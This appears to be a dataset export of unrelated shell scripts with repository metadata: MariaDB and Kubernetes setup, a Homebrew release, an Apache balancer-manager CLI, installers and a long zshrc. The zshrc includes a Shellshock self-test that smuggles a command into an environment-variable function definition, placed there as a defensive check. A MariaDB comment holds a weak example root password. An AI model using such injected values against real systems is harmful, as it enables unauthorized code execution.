/usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:arrangeBy name" ~/Library/Preferences/com.apple.finder.plist
# Finder > Show View Options > Sort By: Name
/usr/libexec/PlistBuddy -c "Set :StandardViewSettings:IconViewSettings:arrangeBy name" ~/Library/Preferences/com.apple.finder.plist
###############################################################################
# Kill affected applications #
###############################################################################
for app in "Dock" "Finder"; do
echo "Killing ${app}"
killall "${app}" &> /dev/null
done
echo "Done. Note that some of these changes require a logout/restart to take effect."
| true
|
d775da17494c0bfddba147efb3d9122ba09f5474
|
Shell
|
777777777777777777777777777777/slackalamp
|
/mariadb.sh
|
UTF-8
| 476
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/bash
# First-run bootstrap and launcher for MariaDB: write a minimal /etc/my.cnf
# when absent, initialize the data directory when empty, then exec
# mysqld_safe in the foreground (container-entrypoint style).
DATA=/var/lib/mysql
if [ ! -f /etc/my.cnf ]; then
	# BUGFIX: datadir was hard-coded to /etc, contradicting the ${DATA}
	# directory that mysql_install_db/chown operate on below.
	cat > /etc/my.cnf <<EOF
[server]
basedir=/usr
datadir=${DATA}
plugin-dir=/usr/lib64/mysql/plugin
user=mysql
EOF
fi
if [ ! -d "${DATA}/mysql" ]; then
	# some settings
	echo "setting"
	mysql_install_db --defaults-extra-file=/etc/my.cnf
	chown mysql:mysql -Rv "${DATA}"
fi
#start
# exec replaces this shell so mysqld_safe receives signals directly.
exec mysqld_safe --defaults-extra-file=/etc/my.cnf --pid-file=/var/run/mysql/mysql.pid
#after exec
#mysqladmin -u root password '12345678'
| true
|
0287e2ea9998d2cf046e66fcb2da2aa509f0f1b7
|
Shell
|
dkundel/danger-js
|
/scripts/create-homebrew-tap-pr.sh
|
UTF-8
| 1,043
| 3.5
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Publish a Homebrew release of danger-js: compute the sha256 of the macOS
# zip, regenerate the danger-js.rb formula in a throwaway clone of
# danger/homebrew-tap, commit and push. Requires VERSION in the environment.

[ -z ${VERSION+x} ] && { echo "VERSION is missing"; exit 1; }

FILE=brew-distribution/danger-macos.zip
[ -f ${FILE} ] || {
	echo ${FILE} not found!
	exit 1
}

SHA=$(shasum -a 256 ${FILE} | cut -f 1 -d " ")
echo "$SHA"

# Clone tap repo
HOMEBREW_TAP_TMPDIR=$(mktemp -d)
git clone --depth 1 git@github.com:danger/homebrew-tap.git "$HOMEBREW_TAP_TMPDIR"
cd "$HOMEBREW_TAP_TMPDIR" || exit 1
# git config user.name danger
# git config user.email danger@users.noreply.github.com

# Write formula in one redirected group instead of repeated appends.
{
	echo "class DangerJs < Formula"
	echo " homepage \"https://github.com/danger/danger-js\""
	echo " url \"https://github.com/danger/danger-js/releases/download/${VERSION}/danger-macos.zip\""
	echo " sha256 \"${SHA}\""
	echo
	echo " def install"
	echo " bin.install \"danger\""
	echo " end"
	echo "end"
} > danger-js.rb

# Commit changes
git add danger-js.rb
git commit -m "Releasing danger-js version ${VERSION}"
git push origin master
| true
|
71b5974dd6656c281902cedd835ab79206be815b
|
Shell
|
afloresv/nnc
|
/fold
|
UTF-8
| 438
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
# Run every algorithm in listAlg over each dataset file for folds 0..9,
# emitting one TSV row per run (header first). Progress goes to stderr so
# stdout stays machine-readable.
listAlg=( CNN NET FCNN MSS VSS RSS 0.1-RSS 0.5-RSS 1-RSS HSS 0.1-HSS 0.5-HSS 1-HSS)
echo -e "alg\tfile\tfold\tsize\terror\tcdmin\tcdq1\tcdmed\tcdq3\tcdmax\tcdavg\ttime"
# Iterate the glob directly instead of parsing `ls` output (which word-splits
# and breaks on unusual filenames).
for file in dataset/synthetic/v-*.txt dataset/uci/*.txt
do
	# Skip literal unmatched patterns when a directory is empty.
	[ -e "$file" ] || continue
	f=$(basename "$file" .txt)
	>&2 echo ">>> $f"
	for alg in "${listAlg[@]}"
	do
		>&2 echo " $alg"
		for i in {0..9}
		do
			echo -en "$alg\t$f\t$i\t"
			./NNC "$alg" "$file" "$i"
		done
	done
done
| true
|
93d32a3469ad7dfa7f2333203dcb83cb753b038a
|
Shell
|
yuanzhang/k8s
|
/k8s/bin/master_install.sh
|
UTF-8
| 2,257
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/bash
# Install the Kubernetes master: generate config files, substitute host/etcd
# placeholders, install them plus TLS keys and systemd units, then (re)start
# every master service.
set -e
# BUGFIX: use an arithmetic test; `[[ $# < 1 ]]` compared strings.
if [[ $# -lt 1 ]]
then
	echo "run as: sh master_install.sh 'https:\/\/172.17.77.90:2379,https:\/\/172.17.181.176:2379,https:\/\/172.17.181.177:2379' "
	echo "params 1: etcd servers"
	exit
fi
## Generate the config files.
## BUGFIX: the original comments here were mojibake split across lines, so
## the stray continuation text executed as commands and aborted the script
## under `set -e`. They are restored as English comments.
sh install/config_install.sh
## Copy the configs into /etc/kubernetes.
ETCD_SERVERS=$1
HOSTNAME=`hostname`
# NOTE(review): `tr -d "addr:"` deletes the characters a, d, r and ':'
# anywhere in the string, not the literal prefix "addr:" -- fine for plain
# dotted-quad output, but confirm on systems printing "inet addr:x.x.x.x".
LOCAL_IP=`ifconfig eth0|grep inet|grep -v 127.0.0.1|grep -v inet6|awk '{print $2}'|tr -d "addr:"`
MASTER_IP=${LOCAL_IP}
ETC=../etc/etc-kubernetes
TMP_DIR=master_tmp
API_SERVER=${ETC}/apiserver
TMP_API_SERVER=${TMP_DIR}/apiserver
CONTROLLER_MAN=${ETC}/controller-manager
TMP_CONTROLLER_MAN=${TMP_DIR}/controller-manager
KUBELET=${ETC}/kubelet
TMP_KUBELET=${TMP_DIR}/kubelet
PROXY=${ETC}/proxy
TMP_PROXY=${TMP_DIR}/proxy
SCHEDULER=${ETC}/scheduler
TMP_SCHEDULER=${TMP_DIR}/scheduler
CONFIG=${ETC}/config
TMP_CONFIG=${TMP_DIR}/config
# Stage pristine copies in a scratch dir, substitute placeholders, then
# install the results and clean up.
rm -rf ${TMP_DIR}
mkdir ${TMP_DIR}
cp ${API_SERVER} ${TMP_DIR}/
cp ${CONTROLLER_MAN} ${TMP_DIR}/
cp ${KUBELET} ${TMP_DIR}/
cp ${PROXY} ${TMP_DIR}/
cp ${SCHEDULER} ${TMP_DIR}/
cp ${CONFIG} ${TMP_DIR}/
sed -i "s/{\$BIND_ADDRESS}/${LOCAL_IP}/g" ${TMP_API_SERVER}
sed -i "s/{\$ETCD_SERVERS}/${ETCD_SERVERS}/g" ${TMP_API_SERVER}
sed -i "s/{\$MASTER}/${MASTER_IP}/g" ${TMP_CONTROLLER_MAN}
sed -i "s/{\$HOSTNAME}/${HOSTNAME}/g" ${TMP_KUBELET}
sed -i "s/{\$BIND_ADDRESS}/${LOCAL_IP}/g" ${TMP_PROXY}
sed -i "s/{\$MASTER_IP}/${MASTER_IP}/g" ${TMP_CONFIG}
cp ${TMP_DIR}/* /etc/kubernetes/ -rf
rm -rf ${TMP_DIR}
## Install the TLS key files.
KEY_DIR=../key
cp ${KEY_DIR}/* /etc/kubernetes/ssl/ -rf
## Follow-up setup.
sh install/tail_install.sh
sh install/tools_install.sh
## Install the systemd unit files.
SYSTEMCTL_DIR=../etc/systemctl/
SYSTEM_DIR=/usr/lib/systemd/system/
cp ${SYSTEMCTL_DIR}/kube-apiserver.service ${SYSTEM_DIR}
cp ${SYSTEMCTL_DIR}/kube-controller-manager.service ${SYSTEM_DIR}
cp ${SYSTEMCTL_DIR}/kube-proxy.service ${SYSTEM_DIR}
cp ${SYSTEMCTL_DIR}/kube-scheduler.service ${SYSTEM_DIR}
cp ${SYSTEMCTL_DIR}/kubelet.service ${SYSTEM_DIR}
## Restart and enable every master service.
systemctl daemon-reload
for k in kube-apiserver \
kube-controller-manager \
kube-scheduler \
kubelet \
kube-proxy
do systemctl stop $k;
systemctl start $k;
systemctl enable $k;
systemctl status $k -l;
done
| true
|
709f019c7f09c89830e09acd1b3e81bc3d4478ed
|
Shell
|
xordoquy/salt
|
/pkg/osx/scripts/preflight.sh
|
UTF-8
| 833
| 3.21875
| 3
|
[
"Apache-2.0",
"MIT",
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
###############################################################################
#
# Title: Pre Install Script for Salt Installation
# Authors: Shane Lee
# Date: December 2015
#
# Description: This script stops the salt minion service before attempting to
# install Salt on Mac OSX
#
# Requirements:
# - None
#
# Usage:
# This script is run as a part of the OSX Salt Installation
#
###############################################################################
###############################################################################
# Stop the service
###############################################################################
set -e

# Nothing to do when the minion launch daemon is not currently loaded.
if ! /bin/launchctl list "com.saltstack.salt.minion" > /dev/null 2>&1; then
    exit 0
fi

# The daemon is loaded: unload it so the installer can replace its files.
/bin/launchctl unload "/Library/LaunchDaemons/com.saltstack.salt.minion.plist"
| true
|
410a71cb4be382945684bc7eeabc4920048e6958
|
Shell
|
jan-swiecki/hyzone
|
/installers/python.sh
|
UTF-8
| 488
| 2.53125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Build and install Python 3.5.1 from source into /opt/python3.5 and link it
# as the system-wide `python`/`pip`, then remove the build directory.
# BUGFIX: abort on any failed step -- previously a failed download or build
# fell through to the remaining steps, including the final `rm -rf`.
set -e

sudo apt-get install -y build-essential checkinstall
mkdir -p ~/python-install
cd ~/python-install
wget https://www.python.org/ftp/python/3.5.1/Python-3.5.1.tar.xz
tar xJf ./Python-3.5.1.tar.xz
cd ./Python-3.5.1
./configure --prefix=/opt/python3.5 --with-ensurepip=install
make && sudo make install
sudo ln -s /opt/python3.5/bin/python3 /usr/local/bin/python
sudo ln -s /opt/python3.5/bin/pip3 /usr/local/bin/pip
sudo pip install --upgrade pip
# Clean up the source tree only after a fully successful install.
cd ~
sudo rm -rf python-install
| true
|
40338f0b8498453e20c1a351d4afa51316eefa7e
|
Shell
|
srivathsanmurali/.dotfiles
|
/bin/bmarks
|
UTF-8
| 282
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/sh
# Bookmarks through dmenu
# Userscript for qutebrowser
#
# Concatenates every qutebrowser bookmark file, lets the user pick one entry
# via dmenu, and opens the first field (the URL) in $BROWSER.
set -e
# BUGFIX: "open $*" joins all arguments into the single prompt string dmenu
# expects; "open $@" passed extra arguments as separate words.
url=$(find ~/.config/qutebrowser/bookmarks/ -type f -exec cat {} + |
	dmenu -p "open $*" -i -l 15 |
	awk '{print $1}')
# A cancelled menu yields an empty selection: exit quietly.
if [ -z "$url" ]; then
	exit 0;
fi
#echo "open $@ $url" >> "$QUTE_FIFO"
# BUGFIX: quote the URL -- it may contain shell metacharacters such as '&'.
# $BROWSER stays unquoted on purpose: it may carry its own flags.
$BROWSER "$url"
| true
|
6a27de42f757d3d8803b23150f3aa402c2685a49
|
Shell
|
liuxinjie123/docker-jenkins
|
/get_jenkins.sh
|
UTF-8
| 185
| 2.734375
| 3
|
[] |
no_license
|
#!/bin/bash
if [[ ! -f jenkins.war ]]; then
curl -fL http://mirrors.jenkins-ci.org/war-stable/$JENKINS_VERSION/jenkins.war -o jenkins.war
else
echo "jenkins.war already exists";
fi
| true
|
cd48373f1ee85c05444411e863b42d4b6123e4de
|
Shell
|
tmanev/quis-listing
|
/deployment_scripts/apache-balancer.sh
|
UTF-8
| 3,574
| 3.640625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#! /bin/sh
# Set up a default search path
PATH="/usr/bin:/bin"
CURL=`which curl`
if [ -z "$CURL" ]; then
echo "curl not found"
exit 1
fi
server="localhost"
port="80"
manager="balancer-manager"
while getopts "s:p:m:" opt; do
case "$opt" in
s)
server=$OPTARG
;;
p)
port=$OPTARG
;;
m)
manager=$OPTARG
;;
esac
done
shift $(($OPTIND - 1))
action=$1
list_balancers() {
$CURL -s "http://${server}:${port}/${manager}" | grep "balancer://" | sed "s/.*balancer:\/\/\(.*\)<\/a>.*/\1/"
}
list_workers() {
balancer=$1
if [ -z "$balancer" ]; then
echo "Usage: $0 [-s host] [-p port] [-m balancer-manager] list-workers balancer_name"
echo " balancer_name : balancer name"
exit 1
fi
$CURL -s "http://${server}:${port}/${manager}" | grep "/balancer-manager?b=${balancer}&w" | sed "s/.*href='\(.[^']*\).*/\1/" | sed "s/.*w=\(.*\)&.*/\1/"
}
enable() {
balancer=$1
worker=$2
if [ -z "$balancer" ] || [ -z "$worker" ]; then
echo "Usage: $0 [-s host] [-p port] [-m balancer-manager] enable balancer_name worker_route"
echo " balancer_name : balancer/cluster name"
echo " worker_route : worker route e.g.) ajp://192.1.2.3:8009"
exit 1
fi
nonce=`$CURL -s "http://${server}:${port}/${manager}" | grep nonce | grep "${balancer}" | sed "s/.*nonce=\(.*\)['\"].*/\1/" | tail -n 1`
if [ -z "$nonce" ]; then
echo "balancer_name ($balancer) not found"
exit 1
fi
echo "Enabling $2 of $1..."
# Apache 2.2.x
#$CURL -s -o /dev/null -XPOST "http://${server}:${port}/${manager}?" -d b="${balancer}" -d w="${worker}" -d nonce="${nonce}" -d dw=Enable
$CURL -s -o /dev/null -XPOST "http://${server}:${port}/${manager}?" -d b="${balancer}" -d w="${worker}" -d nonce="${nonce}" -d w_status_D=0
sleep 2
status
}
disable() {
balancer=$1
worker=$2
if [ -z "$balancer" ] || [ -z "$worker" ]; then
echo "Usage: $0 [-s host] [-p port] [-m balancer-manager] disable balancer_name worker_route"
echo " balancer_name : balancer/cluster name"
echo " worker_route : worker route e.g.) ajp://192.1.2.3:8009"
exit 1
fi
echo "Disabling $2 of $1..."
nonce=`$CURL -s "http://${server}:${port}/${manager}" | grep nonce | grep "${balancer}" | sed "s/.*nonce=\(.*\)['\"].*/\1/" | tail -n 1`
if [ -z "$nonce" ]; then
echo "balancer_name ($balancer) not found"
exit 1
fi
# Apache 2.2.x
#$CURL -s -o /dev/null -XPOST "http://${server}:${port}/${manager}?" -d b="${balancer}" -d w="${worker}" -d nonce="${nonce}" -d dw=Disable
$CURL -s -o /dev/null -XPOST "http://${server}:${port}/${manager}?" -d b="${balancer}" -d w="${worker}" -d nonce="${nonce}" -d w_status_D=1
sleep 2
status
}
status() {
$CURL -s "http://${server}:${port}/${manager}" | grep "href" | sed "s/<[^>]*>/ /g"
}
case "$1" in
list-balancer)
list_balancers "${@:2}"
;;
list-worker)
list_workers "${@:2}"
;;
enable)
enable "${@:2}"
;;
disable)
disable "${@:2}"
;;
status)
status "${@:2}"
;;
*)
echo "Usage: $0 {list-balancer|list-worker|enable|disable|status}"
echo ""
echo "Options: "
echo " -s server"
echo " -p port"
echo " -m balancer-manager-context-path"
echo ""
echo "Commands: "
echo " list-balancer"
echo " list-worker balancer-name"
echo " enable balancer_name worker_route"
echo " disable balancer_name worker_route"
exit 1
esac
exit $?
| true
|
9c49ce3a7f311733cc680e7eec6d63d700ea934c
|
Shell
|
kergoth/mac-game-tools
|
/set-graphics-mac
|
UTF-8
| 420
| 3.3125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
PATH="$(dirname "$0"):$PATH"
tmpfile="$(mktemp -t "mac-graphics.reg.XXXXXX")" || exit 1
trap 'rm -f "$tmpfile"' EXIT INT TERM
cat >"$tmpfile" <<END
REGEDIT4
[HKEY_CURRENT_USER\\Software\\Wine\\Drivers]
"Graphics"="mac"
END
for app; do
app="${app%.app}.app"
if ! grep -qx '"Graphics"="mac"' "$app/Contents/Resources/user.reg"; then
wineskin-run "$app" wine regedit /C "$tmpfile"
fi
done
| true
|
a17833d987690e7bda2b023786b87ccf54266f17
|
Shell
|
wmayner/dotfiles
|
/zsh/zshrc.symlink
|
UTF-8
| 17,155
| 3.109375
| 3
|
[] |
no_license
|
#!/usr/bin/env zsh
# vim: sw=2 ts=2 sts=2 tw=80 foldmarker={,} foldlevel=0 foldmethod=marker
#
# zshrc of wmayner
# Enable Powerlevel10k instant prompt. Should stay close to the top of ~/.zshrc.
# Initialization code that may require console input (password prompts, [y/n]
# confirmations, etc.) must go above this block; everything else may go below.
if [[ -r "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh" ]]; then
source "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh"
fi
# zshrc.before.local {
# Put system-specific stuff that needs to be sourced early in
# `~/.zshrc.before.local`.
[ -f "$HOME/.zshrc.before.local" ] && source "$HOME/.zshrc.before.local"
# }
# To customize prompt, run `p10k configure` or edit ~/.p10k.zsh.
[[ ! -f ~/.p10k.zsh ]] || source ~/.p10k.zsh
OS=$(uname -s)
# Environment variables {
export DEFAULT_USER="will"
# Set the default editor
export EDITOR="vim"
export VISUAL="vim"
# Development directory
export DEV="$HOME/dev"
# Project directory
export CODE="$DEV/projects"
# Path to dotfiles repo
export DOTFILES="$HOME/dotfiles"
# Locale
export LANG="en_US.UTF-8"
export LC_ALL="$LANG"
# Lazily load nvm
export NVM_LAZY_LOAD=true
# }
# PATH {
# TeX commands
export PATH="$PATH:/usr/texbin"
# NVIDIA CUDA libraries
export PATH="$PATH:/Developer/NVIDIA/CUDA-8.0/bin"
export DYLD_LIBRARY_PATH="/Developer/NVIDIA/CUDA-8.0/lib:$DYLD_LIBRARY_PATH"
if [ "$OS" = "Darwin" ]; then
# GNU-utilities
export PATH="/usr/local/opt/grep/libexec/gnubin:$PATH"
# Add Visual Studio Code (code)
# export PATH="$PATH:/Applications/Visual Studio Code.app/Contents/Resources/app/bin"
export PATH="$PATH:/Applications/Visual Studio Code - Insiders.app/Contents/Resources/app/bin"
fi
# User-local executables
export PATH="$HOME/.local/bin:$PATH"
# Dotfile executables
export PATH="$HOME/dotfiles/bin:$PATH"
# Local executables
export PATH="$HOME/bin:$PATH"
# }
# Python {
# # virtualenvwrapper {
# export WORKON_HOME="$HOME/.virtualenvs"
# export PROJECT_HOME="$CODE"
# export VIRTUALENV_PYTHON="$(which python3)"
# export VIRTUALENVWRAPPER_PYTHON="$(which python3)"
# export VIRTUAL_ENV_DISABLE_PROMPT=1
# source "$(which virtualenvwrapper.sh)"
# # Auto-set VIRTUAL_ENV in tmux
# if [[ -n "$TMUX" ]] && [ -n "$VIRTUAL_ENV" ]; then
# tmux set-environment VIRTUAL_ENV $VIRTUAL_ENV
# fi
# # Activate VIRTUAL_ENV if set
# if [ -n "$VIRTUAL_ENV" ]; then
# source $VIRTUAL_ENV/bin/activate # commented out by conda initialize
# fi
# }
# conda {
# >>> conda initialize >>>
# !! Contents within this block are managed by 'conda init' !!
__conda_setup="$('/Users/will/miniconda3/bin/conda' 'shell.zsh' 'hook' 2> /dev/null)"
if [ $? -eq 0 ]; then
eval "$__conda_setup"
else
if [ -f "/Users/will/miniconda3/etc/profile.d/conda.sh" ]; then
. "/Users/will/miniconda3/etc/profile.d/conda.sh"
else
export PATH="/Users/will/miniconda3/bin:$PATH"
fi
fi
unset __conda_setup
# <<< conda initialize <<<
# }
# Get base environment Python version
local PYTHON_VERSION=$("$HOME/miniconda3/bin/python" --version | cut -c 8,9,10)
if [[ -v TMUX ]]; then
tmux source-file "$HOME/.tmux.conf"
conda deactivate; conda activate base
fi
# }
# oh-my-zsh {
# Prevent loading https://github.com/ohmyzsh/ohmyzsh/blob/master/lib/compfix.zsh
# since it slows down the prompt considerably
ZSH_DISABLE_COMPFIX=true
# Path to your oh-my-zsh configuration
ZSH="$HOME/.oh-my-zsh"
# Path to your oh-my-zsh custom directory (default is .oh-my-zsh/custom/)
ZSH_CUSTOM=".oh-my-zsh/custom"
# Set name of the theme to load.
# Look in ~/.oh-my-zsh/themes/
# Optionally, if you set this to "random", it'll load a random theme each
# time that oh-my-zsh is loaded.
ZSH_THEME="powerlevel10k/powerlevel10k"
# Example aliases
# alias zshconfig="mate ~/.zshrc"
# alias ohmyzsh="mate ~/.oh-my-zsh"
# Set to this to use case-sensitive completion
# CASE_SENSITIVE="true"
# Comment this out to disable bi-weekly auto-update checks
# DISABLE_AUTO_UPDATE="true"
# Uncomment to change how many often would you like to wait before
# auto-updates occur? (in days)
export UPDATE_ZSH_DAYS=7
# Uncomment following line if you want to disable colors in ls
# DISABLE_LS_COLORS="true"
# Uncomment following line if you want to disable autosetting terminal
# title.
# DISABLE_AUTO_TITLE="true"
# Uncomment following line if you want red dots to be displayed while
# waiting for completion
COMPLETION_WAITING_DOTS="true"
# Which plugins would you like to load? (plugins can be found in
# ~/.oh-my-zsh/plugins/*)
# Custom plugins may be added to ~/.oh-my-zsh/custom/plugins/
# Example format: plugins=(rails git textmate ruby lighthouse)
plugins=(
grunt brew command-not-found git github git-flow git-extras git-hubflow
history-substring-search fasd macos python lol
)
source "$ZSH/oh-my-zsh.sh"
# }
# Keybindings {
# Use vi to edit command line
bindkey -v
# Remove delay in entering command mode, as described by
# http://zsh.sourceforge.net/Guide/zshguide04.html:
#
# You can remove all bindings starting with a given prefix by adding the `-p
# option. The example given in the manual,
# bindkey -rpM viins '\e'
# (except it uses the equivalent form `^[') is amongst the most useful, as it
# will remove the annoying delay after you type `\e' to enter vi command mode.
# The delay is there because the cursor keys usually also start with \e and
# the shell is waiting to see if you actually typed one of those.
# bindkey -rpM viins "\e"
# Use control+j and control+k for scrolling through history, since removing
# all bindings that begin with escape also removes the arrow-key bindings
bindkey "^K" history-substring-search-up
bindkey "^J" history-substring-search-down
# Press Ctrl+Q to push the current command on to the stack. It will disappear,
# allowing you to enter another command, after which it will reappear in the
# prompt.
bindkey "^Q" push-input
# }
# Tool configuration {
# Autoenv {
# See https://github.com/inishchith/autoenv
export AUTOENV_ENABLE_LEAVE='yes'
source ~/.autoenv/activate.sh
# }
# gpg {
export GPG_TTY=$TTY
# }
# zsh {
# Use extended globbing
setopt extendedglob
# }
# Homebrew {
export HOMEBREW_NO_ANALYTICS=1
# }
# dircolors {
autoload colors;
# Find the option for using colors in ls, depending on the version
ls --color -d . &>/dev/null 2>&1 && alias ls='ls --color=auto -F' || alias ls='ls -GF'
# Use dircolors if available
dircolors &>/dev/null 2>&1 && eval `dircolors $DOTFILES/zsh/dircolors.ansi-dark` || export LSCOLORS="Gxfxcxdxbxegedabagacad"
# Use GNU ls if available (for macOS: `brew install coreutils`)
gdircolors &>/dev/null 2>&1 && eval `gdircolors $DOTFILES/zsh/dircolors.ansi-dark` && alias ls='gls --color=auto -hF'
export GREP_COLOR='1;31'
# }
# git {
# Fix slow tab completion
__git_files () {
_wanted files expl 'local files' _files
}
# }
# less {
# Pygmentize less automatically
# (requires pygmentize to be available; `pip install pygments`)
export LESSOPEN='|$HOME/.lessfilter %s'
# }
# SHELLSHOCK {
# To anyone worried about using servers that may not have attentive admins -
# put the following line(s) in your ~/.bashrc to help protect yourself:
env x='() { :;}; echo "WARNING: SHELLSHOCK DETECTED"' \
bash --norc -c ':' 2>/dev/null;
# It will print to stdout if and only if your shell is vulnerable, and nothing
# will be printed if your shell has been patched. It will take a little longer
# to launch a new shell slightly, but for some, this may be worth it.
# }
# nvm {
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"
# This loads nvm bash_completion
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion"
# }
# node {
# Grunt task tab-completion
command -v grunt >/dev/null && eval "$(grunt --completion=zsh)"
# Gulp task tab-completion
command -v gulp >/dev/null && eval "$(gulp --completion=zsh)"
# }
# fasd {
# Don't limit characters between matches
export _FASD_FUZZY=100
# Initialize
eval "$(fasd --init auto)"
# }
# iterm {
test -e "${HOME}/.iterm2_shell_integration.zsh" && source "${HOME}/.iterm2_shell_integration.zsh"
# }
# zmv (alternative to mmv) {
autoload zmv
# }
# travis {
[ -f "$HOME/.travis/travis.sh" ] && source "$HOME/.travis/travis.sh"
# }
# fzy {
function insert-fzy-path-in-command-line() {
local selected_path
echo # Run fzy underneath the current prompt
selected_path=$(ag . -l -g '' | fzy) || return
LBUFFER="$LBUFFER${(q)selected_path} " # ${(q)VAR} shell-escapes the string
zle reset-prompt
}
zle -N insert-fzy-path-in-command-line
# By default, ^S freezes terminal output, only needed if keybinding is ^S
unsetopt flowcontrol
bindkey "^S" "insert-fzy-path-in-command-line"
# }
# fzf {
_gen_fzf_default_opts() {
local base03="234"
local base02="235"
local base01="240"
local base00="241"
local base0="244"
local base1="245"
local base2="254"
local base3="230"
local yellow="136"
local orange="166"
local red="160"
local magenta="125"
local violet="61"
local blue="33"
local cyan="37"
local green="64"
# Comment and uncomment below for the light theme.
# Solarized Dark color scheme for fzf
export FZF_DEFAULT_OPTS="
--reverse
--color fg:-1,bg:-1,hl:$blue,fg+:$base2,bg+:$base02,hl+:$blue
--color info:$yellow,prompt:$yellow,pointer:$base3,marker:$base3,spinner:$yellow
"
## Solarized Light color scheme for fzf
#export FZF_DEFAULT_OPTS="
# --color fg:-1,bg:-1,hl:$blue,fg+:$base02,bg+:$base2,hl+:$blue
# --color info:$yellow,prompt:$yellow,pointer:$base03,marker:$base03,spinner:$yellow
#"
}
_gen_fzf_default_opts
# Accept history selection instead of putting it on the command line
fzf-history-widget-accept() {
fzf-history-widget
zle accept-line
}
zle -N fzf-history-widget-accept
bindkey '^X^R' fzf-history-widget-accept
[ -f ~/.fzf.zsh ] && source ~/.fzf.zsh
# }
# fast-p {
p () {
ag -U -g ".pdf$" \
| fast-p \
| fzf --read0 --reverse -e -d $'\t' \
--preview-window down:80% --preview '
v=$(echo {q} | tr " " "|");
echo -e {1}"\n"{2} | grep -E "^|$v" -i --color=always;
' \
| cut -z -f 1 -d $'\t' | tr -d '\n' | xargs -r --null open
}
# }
# PyPhi {
export PYPHI_WELCOME_OFF='no'
# }
# }
# Aliases {
# General {
# List only directories
alias lsd="ls -d */"
# Allow colors with less
alias less="less -R"
# Get the absolute path of a file
alias fullpath="readlink -f"
# Use colordiff instead of native diff
alias diff="colordiff"
# Always sudo htop (doesn't work properly on macOS otherwise)
if [ "$OS" = "Darwin" ]; then
alias htop="sudo htop"
fi
# list dir contents (with human-readable sizes)
alias l="ls -AhG1F"
alias ll="ls -lAhGF"
alias lsa="ls -AhGF"
# Safe rm
alias t="trash"
# Clear screen
alias c="clear"
# Clear screen and list contents
alias cl="clear && l"
# Clear screen and print directory tree
alias ck="clear && tree"
# Move up one directory
alias ..="cd .."
# Human-readable disk usage information
alias df="df -h"
# Forward port
alias forward="ssh -NL"
# Syntax highlighting with Pygments
alias hl="pygmentize -g"
# MATLAB binary
alias matlab="/Applications/MATLAB_R2016a.app/bin/matlab"
# ag with custom colors and restricted line width
alias ag="ag --color-line-number 34 --color-match 36 --color-path 32 --width 100"
# }
# vim {
# Editing shortcuts
alias v="vim"
# Edit configuration (from within dotfiles, for interacting with repo)
alias vrc='$EDITOR $(realpath $HOME/.vimrc)'
# }
# git {
alias gp="git push"
# git diff
alias gc="git commit -m"
# git diff
alias gd="git d"
# git diff
alias gdc="git dc"
# git log
alias gl="git l"
# git log all branches
alias gla="git la"
# git branch
alias gb="git branch"
# git branch delete
alias gbd="git branch -d"
# git flow
alias gf="git flow"
# git flow feature
alias gff="git flow feature"
# git flow release
alias gfr="git flow release"
# git flow hotfix
alias gfh="git flow hotfix"
# fast git status
alias g="git status"
# edit .gitconfig
alias vgrc="$EDITOR $HOME/.gitconfig"
# }
# Python {
# Python interpreter
alias p="python"
# IPython intepreter
alias ip="ipython"
# Distribution
alias testregister="python setup.py register -r testpypi"
alias testupload="python setup.py sdist bdist_wheel upload -r testpypi"
alias pypiregister="python setup.py register -r pypi"
alias pypiupload="python setup.py sdist bdist_wheel register upload --sign -r pypi"
# remove dot from py.test executable
alias pytest="python -m pytest"
# }
# conda {
alias deactivate="conda deactivate"
alias activate="conda activate"
alias workon="conda activate"
# }
# LaTeX {
# Run latexmk with following options: compile to pdf, preview continuously
alias latexmk="latexmk -pdf -pvc"
alias ltx="latexmk"
# Edit .tex files in the current directory
alias vtex="find . -iname '*.tex' -exec $EDITOR {} \;"
# }
# fasd {
# Directory change {
alias j="fasd_cd -d"
# restrict matches to subdirectories of the current directory.
alias jc="fasd_cd -dc"
# show a brief help message
alias jh="fasd_cd -h"
# list only
alias jl="fasd_cd -dl"
# match by rank only
alias jr="fasd_cd -dr"
# match by recent access only
alias jt="fasd_cd -dt"
# }
# Output matches to stdout, for use with backticks {
alias jj="fasd -d"
# restrict matches to subdirectories of the current directory.
alias jjc="fasd -dc"
# show a brief help message
alias jjh="fasd -h"
# list only
alias jjl="fasd -dl"
# match by rank only
alias jjr="fasd -dr"
# match by recent access only
alias jjt="fasd -dt"
# }
# }
# zsh {
# Edit zsh config
alias vsh='$EDITOR $(realpath $HOME/.zshrc)'
# Source zsh config
alias szsh='source $(realpath $HOME/.zshrc)'
# }
# browser {
if [ "$OS" = "Darwin" ]; then
alias firefox='/Applications/Firefox.app/Contents/MacOS/firefox'
fi
# }
# }
# Functions {
# conda {
create_conda_env() {
conda create -n $1 -y && \
conda activate $1
}
setup_conda_env() {
nvm > /dev/null
local DEFAULT_PYTHON_VERSION='3.8'
if [[ -z "$1" ]]; then
echo "No python version specified; assuming $DEFAULT_PYTHON_VERSION" 1>&2
local PYTHON_VERSION="$DEFAULT_PYTHON_VERSION"
else
local PYTHON_VERSION="$1"
fi
conda install -y \
python=$PYTHON_VERSION \
jupyterlab \
ipywidgets \
scipy \
numpy \
pandas \
&& \
python -m pip install \
black \
blackcellmagic \
&& \
jupyter labextension install \
@jupyter-widgets/jupyterlab-manager \
@jupyterlab/toc \
@pyviz/jupyterlab_pyviz \
jupyterlab_vim \
&& \
echo "Finished setting up environment." 1>&2
}
conda_install() {
# Don't install anything into base environment
if [[ -v CONDA_DEFAULT_ENV ]] then
conda install $@
else
echo 'No active environment; not installing'
fi
}
alias cinstall='conda_install'
pip() {
# Don't install anything into base environment
if [[ -v CONDA_DEFAULT_ENV ]] then
